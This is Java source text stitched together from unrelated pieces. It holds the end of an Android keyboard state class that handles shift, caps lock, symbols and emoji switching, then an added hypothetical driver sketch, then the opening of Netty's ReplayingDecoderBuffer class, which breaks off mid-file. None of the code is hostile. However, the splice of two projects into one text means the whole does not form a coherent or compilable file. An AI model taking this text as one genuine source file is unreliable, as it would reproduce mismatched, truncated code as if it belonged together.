public void onLoadKeyboard(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onLoadKeyboard: " + this);
}
// Reset alphabet shift state.
mAlphabetShiftState.setShiftLocked(false);
mPrevMainKeyboardWasShiftLocked = false;
mPrevSymbolsKeyboardWasShifted = false;
mShiftKeyState.onRelease();
mSymbolKeyState.onRelease();
onRestoreKeyboardState(currentAutoCapsState, currentRecapitalizeState);
}
private static final int UNSHIFT = 0;
private static final int MANUAL_SHIFT = 1;
private static final int AUTOMATIC_SHIFT = 2;
private static final int SHIFT_LOCK_SHIFTED = 3;
public void onSaveKeyboardState() {
final SavedKeyboardState state = mSavedKeyboardState;
state.mIsAlphabetMode = mIsAlphabetMode;
state.mIsEmojiMode = mIsEmojiMode;
if (mIsAlphabetMode) {
state.mIsAlphabetShiftLocked = mAlphabetShiftState.isShiftLocked();
state.mShiftMode = mAlphabetShiftState.isAutomaticShifted() ? AUTOMATIC_SHIFT
: (mAlphabetShiftState.isShiftedOrShiftLocked() ? MANUAL_SHIFT : UNSHIFT);
} else {
state.mIsAlphabetShiftLocked = mPrevMainKeyboardWasShiftLocked;
state.mShiftMode = mIsSymbolShifted ? MANUAL_SHIFT : UNSHIFT;
}
state.mIsValid = true;
if (DEBUG_EVENT) {
Log.d(TAG, "onSaveKeyboardState: saved=" + state + " " + this);
}
}
private void onRestoreKeyboardState(final int currentAutoCapsState,
final int currentRecapitalizeState) {
final SavedKeyboardState state = mSavedKeyboardState;
if (DEBUG_EVENT) {
Log.d(TAG, "onRestoreKeyboardState: saved=" + state + " " + this);
}
if (!state.mIsValid || state.mIsAlphabetMode) {
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
} else if (state.mIsEmojiMode) {
setEmojiKeyboard();
} else {
if (state.mShiftMode == MANUAL_SHIFT) {
setSymbolsShiftedKeyboard();
} else {
setSymbolsKeyboard();
}
}
if (!state.mIsValid) return;
state.mIsValid = false;
if (state.mIsAlphabetMode) {
setShiftLocked(state.mIsAlphabetShiftLocked);
if (!state.mIsAlphabetShiftLocked) {
setShifted(state.mShiftMode);
}
} else {
mPrevMainKeyboardWasShiftLocked = state.mIsAlphabetShiftLocked;
}
}
private void setShifted(final int shiftMode) {
if (DEBUG_ACTION) {
Log.d(TAG, "setShifted: shiftMode=" + shiftModeToString(shiftMode) + " " + this);
}
if (!mIsAlphabetMode) return;
final int prevShiftMode;
if (mAlphabetShiftState.isAutomaticShifted()) {
prevShiftMode = AUTOMATIC_SHIFT;
} else if (mAlphabetShiftState.isManualShifted()) {
prevShiftMode = MANUAL_SHIFT;
} else {
prevShiftMode = UNSHIFT;
}
switch (shiftMode) {
case AUTOMATIC_SHIFT:
mAlphabetShiftState.setAutomaticShifted();
if (shiftMode != prevShiftMode) {
mSwitchActions.setAlphabetAutomaticShiftedKeyboard();
}
break;
case MANUAL_SHIFT:
mAlphabetShiftState.setShifted(true);
if (shiftMode != prevShiftMode) {
mSwitchActions.setAlphabetManualShiftedKeyboard();
}
break;
case UNSHIFT:
mAlphabetShiftState.setShifted(false);
if (shiftMode != prevShiftMode) {
mSwitchActions.setAlphabetKeyboard();
}
break;
case SHIFT_LOCK_SHIFTED:
mAlphabetShiftState.setShifted(true);
mSwitchActions.setAlphabetShiftLockShiftedKeyboard();
break;
}
}
private void setShiftLocked(final boolean shiftLocked) {
if (DEBUG_ACTION) {
Log.d(TAG, "setShiftLocked: shiftLocked=" + shiftLocked + " " + this);
}
if (!mIsAlphabetMode) return;
if (shiftLocked && (!mAlphabetShiftState.isShiftLocked()
|| mAlphabetShiftState.isShiftLockShifted())) {
mSwitchActions.setAlphabetShiftLockedKeyboard();
}
if (!shiftLocked && mAlphabetShiftState.isShiftLocked()) {
mSwitchActions.setAlphabetKeyboard();
}
mAlphabetShiftState.setShiftLocked(shiftLocked);
}
private void toggleAlphabetAndSymbols(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_ACTION) {
Log.d(TAG, "toggleAlphabetAndSymbols: " + this);
}
if (mIsAlphabetMode) {
mPrevMainKeyboardWasShiftLocked = mAlphabetShiftState.isShiftLocked();
if (mPrevSymbolsKeyboardWasShifted) {
setSymbolsShiftedKeyboard();
} else {
setSymbolsKeyboard();
}
mPrevSymbolsKeyboardWasShifted = false;
} else {
mPrevSymbolsKeyboardWasShifted = mIsSymbolShifted;
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
if (mPrevMainKeyboardWasShiftLocked) {
setShiftLocked(true);
}
mPrevMainKeyboardWasShiftLocked = false;
}
}
// TODO: Remove this method. Come up with a more comprehensive way to reset the keyboard layout
// when a keyboard layout set doesn't get reloaded in LatinIME.onStartInputViewInternal().
private void resetKeyboardStateToAlphabet(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_ACTION) {
Log.d(TAG, "resetKeyboardStateToAlphabet: " + this);
}
if (mIsAlphabetMode) return;
mPrevSymbolsKeyboardWasShifted = mIsSymbolShifted;
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
if (mPrevMainKeyboardWasShiftLocked) {
setShiftLocked(true);
}
mPrevMainKeyboardWasShiftLocked = false;
}
private void toggleShiftInSymbols() {
if (mIsSymbolShifted) {
setSymbolsKeyboard();
} else {
setSymbolsShiftedKeyboard();
}
}
private void setAlphabetKeyboard(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_ACTION) {
Log.d(TAG, "setAlphabetKeyboard");
}
mSwitchActions.setAlphabetKeyboard();
mIsAlphabetMode = true;
mIsEmojiMode = false;
mIsSymbolShifted = false;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
mSwitchState = SWITCH_STATE_ALPHA;
mSwitchActions.requestUpdatingShiftState(currentAutoCapsState, currentRecapitalizeState);
}
private void setSymbolsKeyboard() {
if (DEBUG_ACTION) {
Log.d(TAG, "setSymbolsKeyboard");
}
mSwitchActions.setSymbolsKeyboard();
mIsAlphabetMode = false;
mIsSymbolShifted = false;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
// Reset alphabet shift state.
mAlphabetShiftState.setShiftLocked(false);
mSwitchState = SWITCH_STATE_SYMBOL_BEGIN;
}
private void setSymbolsShiftedKeyboard() {
if (DEBUG_ACTION) {
Log.d(TAG, "setSymbolsShiftedKeyboard");
}
mSwitchActions.setSymbolsShiftedKeyboard();
mIsAlphabetMode = false;
mIsSymbolShifted = true;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
// Reset alphabet shift state.
mAlphabetShiftState.setShiftLocked(false);
mSwitchState = SWITCH_STATE_SYMBOL_BEGIN;
}
private void setEmojiKeyboard() {
if (DEBUG_ACTION) {
Log.d(TAG, "setEmojiKeyboard");
}
mIsAlphabetMode = false;
mIsEmojiMode = true;
mRecapitalizeMode = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
// Remember caps lock mode and reset alphabet shift state.
mPrevMainKeyboardWasShiftLocked = mAlphabetShiftState.isShiftLocked();
mAlphabetShiftState.setShiftLocked(false);
mSwitchActions.setEmojiKeyboard();
}
public void onPressKey(final int code, final boolean isSinglePointer,
final int currentAutoCapsState, final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onPressKey: code=" + Constants.printableCode(code) + " single="
+ isSinglePointer + " autoCaps=" + currentAutoCapsState + " " + this);
}
if (code != Constants.CODE_SHIFT) {
// Because the double tap shift key timer is used to detect two consecutive shift key presses,
// it should be canceled when a non-shift key is pressed.
mSwitchActions.cancelDoubleTapShiftKeyTimer();
}
if (code == Constants.CODE_SHIFT) {
onPressShift();
} else if (code == Constants.CODE_CAPSLOCK) {
// Nothing to do here. See {@link #onReleaseKey(int,boolean)}.
} else if (code == Constants.CODE_SWITCH_ALPHA_SYMBOL) {
onPressSymbol(currentAutoCapsState, currentRecapitalizeState);
} else {
mShiftKeyState.onOtherKeyPressed();
mSymbolKeyState.onOtherKeyPressed();
// It is required to reset the auto caps state when all of the following conditions
// are met:
// 1) two or more fingers are in action
// 2) in alphabet layout
// 3) not in all characters caps mode
// As for #3, please note that it's required to check even when the auto caps mode is
// off because, for example, we may be in the #1 state within the manual temporary
// shifted mode.
if (!isSinglePointer && mIsAlphabetMode
&& currentAutoCapsState != TextUtils.CAP_MODE_CHARACTERS) {
final boolean needsToResetAutoCaps = mAlphabetShiftState.isAutomaticShifted()
|| (mAlphabetShiftState.isManualShifted() && mShiftKeyState.isReleasing());
if (needsToResetAutoCaps) {
mSwitchActions.setAlphabetKeyboard();
}
}
}
}
public void onReleaseKey(final int code, final boolean withSliding,
final int currentAutoCapsState, final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onReleaseKey: code=" + Constants.printableCode(code)
+ " sliding=" + withSliding + " " + this);
}
if (code == Constants.CODE_SHIFT) {
onReleaseShift(withSliding, currentAutoCapsState, currentRecapitalizeState);
} else if (code == Constants.CODE_CAPSLOCK) {
setShiftLocked(!mAlphabetShiftState.isShiftLocked());
} else if (code == Constants.CODE_SWITCH_ALPHA_SYMBOL) {
onReleaseSymbol(withSliding, currentAutoCapsState, currentRecapitalizeState);
}
}
private void onPressSymbol(final int currentAutoCapsState,
final int currentRecapitalizeState) {
toggleAlphabetAndSymbols(currentAutoCapsState, currentRecapitalizeState);
mSymbolKeyState.onPress();
mSwitchState = SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL;
}
private void onReleaseSymbol(final boolean withSliding, final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (mSymbolKeyState.isChording()) {
// Switch back to the previous keyboard mode if the user chords the mode change key and
// another key, then releases the mode change key.
toggleAlphabetAndSymbols(currentAutoCapsState, currentRecapitalizeState);
} else if (!withSliding) {
// If the mode change key is being released without sliding, we should forget the
// previous symbols keyboard shift state and simply switch back to symbols layout
// (never symbols shifted) next time the mode gets changed to symbols layout.
mPrevSymbolsKeyboardWasShifted = false;
}
mSymbolKeyState.onRelease();
}
public void onUpdateShiftState(final int autoCaps, final int recapitalizeMode) {
if (DEBUG_EVENT) {
Log.d(TAG, "onUpdateShiftState: autoCaps=" + autoCaps + ", recapitalizeMode="
+ recapitalizeMode + " " + this);
}
mRecapitalizeMode = recapitalizeMode;
updateAlphabetShiftState(autoCaps, recapitalizeMode);
}
// TODO: Remove this method. Come up with a more comprehensive way to reset the keyboard layout
// when a keyboard layout set doesn't get reloaded in LatinIME.onStartInputViewInternal().
public void onResetKeyboardStateToAlphabet(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onResetKeyboardStateToAlphabet: " + this);
}
resetKeyboardStateToAlphabet(currentAutoCapsState, currentRecapitalizeState);
}
private void updateShiftStateForRecapitalize(final int recapitalizeMode) {
switch (recapitalizeMode) {
case RecapitalizeStatus.CAPS_MODE_ALL_UPPER:
setShifted(SHIFT_LOCK_SHIFTED);
break;
case RecapitalizeStatus.CAPS_MODE_FIRST_WORD_UPPER:
setShifted(AUTOMATIC_SHIFT);
break;
case RecapitalizeStatus.CAPS_MODE_ALL_LOWER:
case RecapitalizeStatus.CAPS_MODE_ORIGINAL_MIXED_CASE:
default:
setShifted(UNSHIFT);
}
}
private void updateAlphabetShiftState(final int autoCaps, final int recapitalizeMode) {
if (!mIsAlphabetMode) return;
if (RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE != recapitalizeMode) {
// We are recapitalizing. Match the keyboard to the current recapitalize state.
updateShiftStateForRecapitalize(recapitalizeMode);
return;
}
if (!mShiftKeyState.isReleasing()) {
// Ignore update shift state event while the shift key is being pressed (including
// chording).
return;
}
if (!mAlphabetShiftState.isShiftLocked() && !mShiftKeyState.isIgnoring()) {
if (mShiftKeyState.isReleasing() && autoCaps != Constants.TextUtils.CAP_MODE_OFF) {
// Only when shift key is releasing, automatic temporary upper case will be set.
setShifted(AUTOMATIC_SHIFT);
} else {
setShifted(mShiftKeyState.isChording() ? MANUAL_SHIFT : UNSHIFT);
}
}
}
private void onPressShift() {
// If we are recapitalizing, we don't do any of the normal processing, including
// importantly the double tap timer.
if (RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE != mRecapitalizeMode) {
return;
}
if (mIsAlphabetMode) {
mIsInDoubleTapShiftKey = mSwitchActions.isInDoubleTapShiftKeyTimeout();
if (!mIsInDoubleTapShiftKey) {
// This is first tap.
mSwitchActions.startDoubleTapShiftKeyTimer();
}
if (mIsInDoubleTapShiftKey) {
if (mAlphabetShiftState.isManualShifted() || mIsInAlphabetUnshiftedFromShifted) {
// Shift key has been double tapped while in manual shifted or automatic
// shifted state.
setShiftLocked(true);
} else {
// Shift key has been double tapped while in normal state. This is the second
// tap to disable shift locked state, so just ignore this.
}
} else {
if (mAlphabetShiftState.isShiftLocked()) {
// Shift key is pressed while in the shift locked state; treat this as the
// shift lock shifted state and record the press as if the shift key had been
// pressed in the normal state.
setShifted(SHIFT_LOCK_SHIFTED);
mShiftKeyState.onPress();
} else if (mAlphabetShiftState.isAutomaticShifted()) {
// Shift key is pressed while automatic shifted, we have to move to manual
// shifted.
setShifted(MANUAL_SHIFT);
mShiftKeyState.onPress();
} else if (mAlphabetShiftState.isShiftedOrShiftLocked()) {
// In manual shifted state, just record that the shift key was pressed while
// in a shifted state.
mShiftKeyState.onPressOnShifted();
} else {
// In base layout, chording or manual shifted mode is started.
setShifted(MANUAL_SHIFT);
mShiftKeyState.onPress();
}
}
} else {
// In symbol mode, just toggle between the symbols and more-symbols keyboards.
toggleShiftInSymbols();
mSwitchState = SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE;
mShiftKeyState.onPress();
}
}
private void onReleaseShift(final boolean withSliding, final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE != mRecapitalizeMode) {
// We are recapitalizing. We should match the keyboard state to the recapitalize
// state in priority.
updateShiftStateForRecapitalize(mRecapitalizeMode);
} else if (mIsAlphabetMode) {
final boolean isShiftLocked = mAlphabetShiftState.isShiftLocked();
mIsInAlphabetUnshiftedFromShifted = false;
if (mIsInDoubleTapShiftKey) {
// The double tap of the shift key has already been handled in {@link #onPressShift},
// so just ignore this shift key release here.
mIsInDoubleTapShiftKey = false;
} else if (mShiftKeyState.isChording()) {
if (mAlphabetShiftState.isShiftLockShifted()) {
// After chording input while shift locked state.
setShiftLocked(true);
} else {
// After chording input while normal state.
setShifted(UNSHIFT);
}
// After chording input, automatic shift state may have been changed depending on
// what characters were input.
mShiftKeyState.onRelease();
mSwitchActions.requestUpdatingShiftState(currentAutoCapsState,
currentRecapitalizeState);
return;
} else if (mAlphabetShiftState.isShiftLockShifted() && withSliding) {
// In shift locked state, shift has been pressed and slid out to another key.
setShiftLocked(true);
} else if (mAlphabetShiftState.isManualShifted() && withSliding) {
// Shift has been pressed and slid out to another key.
mSwitchState = SWITCH_STATE_MOMENTARY_ALPHA_SHIFT;
} else if (isShiftLocked && !mAlphabetShiftState.isShiftLockShifted()
&& (mShiftKeyState.isPressing() || mShiftKeyState.isPressingOnShifted())
&& !withSliding) {
// Shift has been long pressed, ignore this release.
} else if (isShiftLocked && !mShiftKeyState.isIgnoring() && !withSliding) {
// Shift has been pressed without chording while shift locked state.
setShiftLocked(false);
} else if (mAlphabetShiftState.isShiftedOrShiftLocked()
&& mShiftKeyState.isPressingOnShifted() && !withSliding) {
// Shift has been pressed without chording while shifted state.
setShifted(UNSHIFT);
mIsInAlphabetUnshiftedFromShifted = true;
} else if (mAlphabetShiftState.isManualShiftedFromAutomaticShifted()
&& mShiftKeyState.isPressing() && !withSliding) {
// Shift has been pressed without chording while in the manual shifted state
// that was transitioned from automatic shifted.
setShifted(UNSHIFT);
mIsInAlphabetUnshiftedFromShifted = true;
}
} else {
// In symbol mode, switch back to the previous keyboard mode if the user chords the
// shift key and another key, then releases the shift key.
if (mShiftKeyState.isChording()) {
toggleShiftInSymbols();
}
}
mShiftKeyState.onRelease();
}
public void onFinishSlidingInput(final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onFinishSlidingInput: " + this);
}
// Switch back to the previous keyboard mode if the user cancels sliding input.
switch (mSwitchState) {
case SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL:
toggleAlphabetAndSymbols(currentAutoCapsState, currentRecapitalizeState);
break;
case SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE:
toggleShiftInSymbols();
break;
case SWITCH_STATE_MOMENTARY_ALPHA_SHIFT:
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
break;
}
}
private static boolean isSpaceOrEnter(final int c) {
return c == Constants.CODE_SPACE || c == Constants.CODE_ENTER;
}
public void onCodeInput(final int code, final int currentAutoCapsState,
final int currentRecapitalizeState) {
if (DEBUG_EVENT) {
Log.d(TAG, "onCodeInput: code=" + Constants.printableCode(code)
+ " autoCaps=" + currentAutoCapsState + " " + this);
}
switch (mSwitchState) {
case SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL:
if (code == Constants.CODE_SWITCH_ALPHA_SYMBOL) {
// Detected only the mode change key has been pressed, and then released.
if (mIsAlphabetMode) {
mSwitchState = SWITCH_STATE_ALPHA;
} else {
mSwitchState = SWITCH_STATE_SYMBOL_BEGIN;
}
}
break;
case SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE:
if (code == Constants.CODE_SHIFT) {
// Detected only the shift key has been pressed on symbol layout, and then
// released.
mSwitchState = SWITCH_STATE_SYMBOL_BEGIN;
}
break;
case SWITCH_STATE_SYMBOL_BEGIN:
if (mIsEmojiMode) {
// When in the Emoji keyboard, we don't want to switch back to the main layout even
// after the user hits an emoji letter followed by an enter or a space.
break;
}
if (!isSpaceOrEnter(code) && (Constants.isLetterCode(code)
|| code == Constants.CODE_OUTPUT_TEXT)) {
mSwitchState = SWITCH_STATE_SYMBOL;
}
break;
case SWITCH_STATE_SYMBOL:
// Switch back to alpha keyboard mode if user types one or more non-space/enter
// characters followed by a space/enter.
if (isSpaceOrEnter(code)) {
toggleAlphabetAndSymbols(currentAutoCapsState, currentRecapitalizeState);
mPrevSymbolsKeyboardWasShifted = false;
}
break;
}
// If the code is a letter, update keyboard shift state.
if (Constants.isLetterCode(code)) {
updateAlphabetShiftState(currentAutoCapsState, currentRecapitalizeState);
} else if (code == Constants.CODE_EMOJI) {
setEmojiKeyboard();
} else if (code == Constants.CODE_ALPHA_FROM_EMOJI) {
setAlphabetKeyboard(currentAutoCapsState, currentRecapitalizeState);
}
}
static String shiftModeToString(final int shiftMode) {
switch (shiftMode) {
case UNSHIFT: return "UNSHIFT";
case MANUAL_SHIFT: return "MANUAL";
case AUTOMATIC_SHIFT: return "AUTOMATIC";
default: return null;
}
}
private static String switchStateToString(final int switchState) {
switch (switchState) {
case SWITCH_STATE_ALPHA: return "ALPHA";
case SWITCH_STATE_SYMBOL_BEGIN: return "SYMBOL-BEGIN";
case SWITCH_STATE_SYMBOL: return "SYMBOL";
case SWITCH_STATE_MOMENTARY_ALPHA_AND_SYMBOL: return "MOMENTARY-ALPHA-SYMBOL";
case SWITCH_STATE_MOMENTARY_SYMBOL_AND_MORE: return "MOMENTARY-SYMBOL-MORE";
case SWITCH_STATE_MOMENTARY_ALPHA_SHIFT: return "MOMENTARY-ALPHA_SHIFT";
default: return null;
}
}
@Override
public String toString() {
return "[keyboard=" + (mIsAlphabetMode ? mAlphabetShiftState.toString()
: (mIsSymbolShifted ? "SYMBOLS_SHIFTED" : "SYMBOLS"))
+ " shift=" + mShiftKeyState
+ " symbol=" + mSymbolKeyState
+ " switch=" + switchStateToString(mSwitchState) + "]";
}
}
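// ---------------------------------------------------------------------------------------------
// Editor's note: a hypothetical driver sketch, not part of the original file. It shows the event
// flow outlined in the class javadoc: the client feeds key events into KeyboardState and supplies
// a SwitchActions callback that actually swaps layouts. LoggingSwitchActions below is an assumed
// stand-in that only records the last requested layout.
final class KeyboardStateSketch {
    static final class LoggingSwitchActions implements KeyboardState.SwitchActions {
        String lastLayout = "none";
        @Override public void setAlphabetKeyboard() { lastLayout = "alphabet"; }
        @Override public void setAlphabetManualShiftedKeyboard() { lastLayout = "alphabet-manual-shifted"; }
        @Override public void setAlphabetAutomaticShiftedKeyboard() { lastLayout = "alphabet-auto-shifted"; }
        @Override public void setAlphabetShiftLockedKeyboard() { lastLayout = "alphabet-shift-locked"; }
        @Override public void setAlphabetShiftLockShiftedKeyboard() { lastLayout = "alphabet-shift-lock-shifted"; }
        @Override public void setEmojiKeyboard() { lastLayout = "emoji"; }
        @Override public void setSymbolsKeyboard() { lastLayout = "symbols"; }
        @Override public void setSymbolsShiftedKeyboard() { lastLayout = "symbols-shifted"; }
        @Override public void requestUpdatingShiftState(int currentAutoCapsState, int currentRecapitalizeState) {
            // A real client would call back into KeyboardState.onUpdateShiftState(...) here.
        }
        @Override public void startDoubleTapShiftKeyTimer() { }
        @Override public boolean isInDoubleTapShiftKeyTimeout() { return false; }
        @Override public void cancelDoubleTapShiftKeyTimer() { }
    }
    static void demo() {
        final LoggingSwitchActions actions = new LoggingSwitchActions();
        final KeyboardState state = new KeyboardState(actions);
        final int noAutoCaps = Constants.TextUtils.CAP_MODE_OFF;
        final int noRecap = RecapitalizeStatus.NOT_A_RECAPITALIZE_MODE;
        // Load the keyboard, tap shift once, then type a letter: the shift press requests the
        // manual shifted layout, and committing the letter lets the state machine drop back to
        // the plain alphabet layout.
        state.onLoadKeyboard(noAutoCaps, noRecap);
        state.onPressKey(Constants.CODE_SHIFT, true /* isSinglePointer */, noAutoCaps, noRecap);
        state.onReleaseKey(Constants.CODE_SHIFT, false /* withSliding */, noAutoCaps, noRecap);
        state.onCodeInput('a', noAutoCaps, noRecap);
    }
}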
|
|
/*
* Copyright 2012 The Netty Project
*
* The Netty Project licenses this file to you under the Apache License,
* version 2.0 (the "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at:
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*/
package io.netty.handler.codec;
import io.netty.buffer.ByteBuf;
import io.netty.buffer.ByteBufAllocator;
import io.netty.buffer.ByteBufProcessor;
import io.netty.buffer.SwappedByteBuf;
import io.netty.buffer.Unpooled;
import io.netty.util.Signal;
import io.netty.util.internal.StringUtil;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.channels.GatheringByteChannel;
import java.nio.channels.ScatteringByteChannel;
import java.nio.charset.Charset;
/**
* Special {@link ByteBuf} implementation which is used by the {@link ReplayingDecoder}
*/
final class ReplayingDecoderBuffer extends ByteBuf {
private static final Signal REPLAY = ReplayingDecoder.REPLAY;
private ByteBuf buffer;
private boolean terminated;
private SwappedByteBuf swapped;
static final ReplayingDecoderBuffer EMPTY_BUFFER = new ReplayingDecoderBuffer(Unpooled.EMPTY_BUFFER);
static {
EMPTY_BUFFER.terminate();
}
ReplayingDecoderBuffer() { }
ReplayingDecoderBuffer(ByteBuf buffer) {
setCumulation(buffer);
}
void setCumulation(ByteBuf buffer) {
this.buffer = buffer;
}
void terminate() {
terminated = true;
}
@Override
public int capacity() {
if (terminated) {
return buffer.capacity();
} else {
return Integer.MAX_VALUE;
}
}
@Override
public ByteBuf capacity(int newCapacity) {
reject();
return this;
}
@Override
public int maxCapacity() {
return capacity();
}
@Override
public ByteBufAllocator alloc() {
return buffer.alloc();
}
@Override
public boolean isDirect() {
return buffer.isDirect();
}
@Override
public boolean hasArray() {
return false;
}
@Override
public byte[] array() {
throw new UnsupportedOperationException();
}
@Override
public int arrayOffset() {
throw new UnsupportedOperationException();
}
@Override
public boolean hasMemoryAddress() {
return false;
}
@Override
public long memoryAddress() {
throw new UnsupportedOperationException();
}
@Override
public ByteBuf clear() {
reject();
return this;
}
@Override
public boolean equals(Object obj) {
return this == obj;
}
@Override
public int compareTo(ByteBuf buffer) {
reject();
return 0;
}
@Override
public ByteBuf copy() {
reject();
return this;
}
@Override
public ByteBuf copy(int index, int length) {
checkIndex(index, length);
return buffer.copy(index, length);
}
@Override
public ByteBuf discardReadBytes() {
reject();
return this;
}
@Override
public ByteBuf ensureWritable(int writableBytes) {
reject();
return this;
}
@Override
public int ensureWritable(int minWritableBytes, boolean force) {
reject();
return 0;
}
@Override
public ByteBuf duplicate() {
reject();
return this;
}
@Override
public boolean getBoolean(int index) {
checkIndex(index, 1);
return buffer.getBoolean(index);
}
@Override
public byte getByte(int index) {
checkIndex(index, 1);
return buffer.getByte(index);
}
@Override
public short getUnsignedByte(int index) {
checkIndex(index, 1);
return buffer.getUnsignedByte(index);
}
@Override
public ByteBuf getBytes(int index, byte[] dst, int dstIndex, int length) {
checkIndex(index, length);
buffer.getBytes(index, dst, dstIndex, length);
return this;
}
@Override
public ByteBuf getBytes(int index, byte[] dst) {
checkIndex(index, dst.length);
buffer.getBytes(index, dst);
return this;
}
@Override
public ByteBuf getBytes(int index, ByteBuffer dst) {
reject();
return this;
}
@Override
public ByteBuf getBytes(int index, ByteBuf dst, int dstIndex, int length) {
checkIndex(index, length);
buffer.getBytes(index, dst, dstIndex, length);
return this;
}
@Override
public ByteBuf getBytes(int index, ByteBuf dst, int length) {
reject();
return this;
}
@Override
public ByteBuf getBytes(int index, ByteBuf dst) {
reject();
return this;
}
@Override
public int getBytes(int index, GatheringByteChannel out, int length) {
reject();
return 0;
}
@Override
public ByteBuf getBytes(int index, OutputStream out, int length) {
reject();
return this;
}
@Override
public int getInt(int index) {
checkIndex(index, 4);
return buffer.getInt(index);
}
@Override
public long getUnsignedInt(int index) {
checkIndex(index, 4);
return buffer.getUnsignedInt(index);
}
@Override
public long getLong(int index) {
checkIndex(index, 8);
return buffer.getLong(index);
}
@Override
public int getMedium(int index) {
checkIndex(index, 3);
return buffer.getMedium(index);
}
@Override
public int getUnsignedMedium(int index) {
checkIndex(index, 3);
return buffer.getUnsignedMedium(index);
}
@Override
public short getShort(int index) {
checkIndex(index, 2);
return buffer.getShort(index);
}
@Override
public int getUnsignedShort(int index) {
checkIndex(index, 2);
return buffer.getUnsignedShort(index);
}
@Override
public char getChar(int index) {
checkIndex(index, 2);
return buffer.getChar(index);
}
@Override
public float getFloat(int index) {
checkIndex(index, 4);
return buffer.getFloat(index);
}
@Override
public double getDouble(int index) {
checkIndex(index, 8);
return buffer.getDouble(index);
}
@Override
public int hashCode() {
reject();
return 0;
}
@Override
public int indexOf(int fromIndex, int toIndex, byte value) {
if (fromIndex == toIndex) {
return -1;
}
if (Math.max(fromIndex, toIndex) > buffer.writerIndex()) {
throw REPLAY;
}
return buffer.indexOf(fromIndex, toIndex, value);
}
@Override
public int bytesBefore(byte value) {
int bytes = buffer.bytesBefore(value);
if (bytes < 0) {
throw REPLAY;
}
return bytes;
}
@Override
public int bytesBefore(int length, byte value) {
final int readerIndex = buffer.readerIndex();
return bytesBefore(readerIndex, buffer.writerIndex() - readerIndex, value);
}
@Override
public int bytesBefore(int index, int length, byte value) {
final int writerIndex = buffer.writerIndex();
if (index >= writerIndex) {
throw REPLAY;
}
if (index <= writerIndex - length) {
return buffer.bytesBefore(index, length, value);
}
int res = buffer.bytesBefore(index, writerIndex - index, value);
if (res < 0) {
throw REPLAY;
} else {
return res;
}
}
@Override
public int forEachByte(ByteBufProcessor processor) {
int ret = buffer.forEachByte(processor);
if (ret < 0) {
throw REPLAY;
} else {
return ret;
}
}
@Override
public int forEachByte(int index, int length, ByteBufProcessor processor) {
final int writerIndex = buffer.writerIndex();
if (index >= writerIndex) {
throw REPLAY;
}
if (index <= writerIndex - length) {
return buffer.forEachByte(index, length, processor);
}
int ret = buffer.forEachByte(index, writerIndex - index, processor);
if (ret < 0) {
throw REPLAY;
} else {
return ret;
}
}
@Override
public int forEachByteDesc(ByteBufProcessor processor) {
if (terminated) {
return buffer.forEachByteDesc(processor);
} else {
reject();
return 0;
}
}
@Override
public int forEachByteDesc(int index, int length, ByteBufProcessor processor) {
if (index + length > buffer.writerIndex()) {
throw REPLAY;
}
return buffer.forEachByteDesc(index, length, processor);
}
@Override
public ByteBuf markReaderIndex() {
buffer.markReaderIndex();
return this;
}
@Override
public ByteBuf markWriterIndex() {
reject();
return this;
}
@Override
public ByteOrder order() {
return buffer.order();
}
@Override
public ByteBuf order(ByteOrder endianness) {
if (endianness == null) {
throw new NullPointerException("endianness");
}
if (endianness == order()) {
return this;
}
SwappedByteBuf swapped = this.swapped;
if (swapped == null) {
this.swapped = swapped = new SwappedByteBuf(this);
}
return swapped;
}
@Override
public boolean isReadable() {
return !terminated || buffer.isReadable();
}
@Override
public boolean isReadable(int size) {
return !terminated || buffer.isReadable(size);
}
@Override
public int readableBytes() {
if (terminated) {
return buffer.readableBytes();
} else {
return Integer.MAX_VALUE - buffer.readerIndex();
}
}
@Override
public boolean readBoolean() {
checkReadableBytes(1);
return buffer.readBoolean();
}
@Override
public byte readByte() {
checkReadableBytes(1);
return buffer.readByte();
}
@Override
public short readUnsignedByte() {
checkReadableBytes(1);
return buffer.readUnsignedByte();
}
@Override
public ByteBuf readBytes(byte[] dst, int dstIndex, int length) {
checkReadableBytes(length);
buffer.readBytes(dst, dstIndex, length);
return this;
}
@Override
public ByteBuf readBytes(byte[] dst) {
checkReadableBytes(dst.length);
buffer.readBytes(dst);
return this;
}
@Override
public ByteBuf readBytes(ByteBuffer dst) {
reject();
return this;
}
@Override
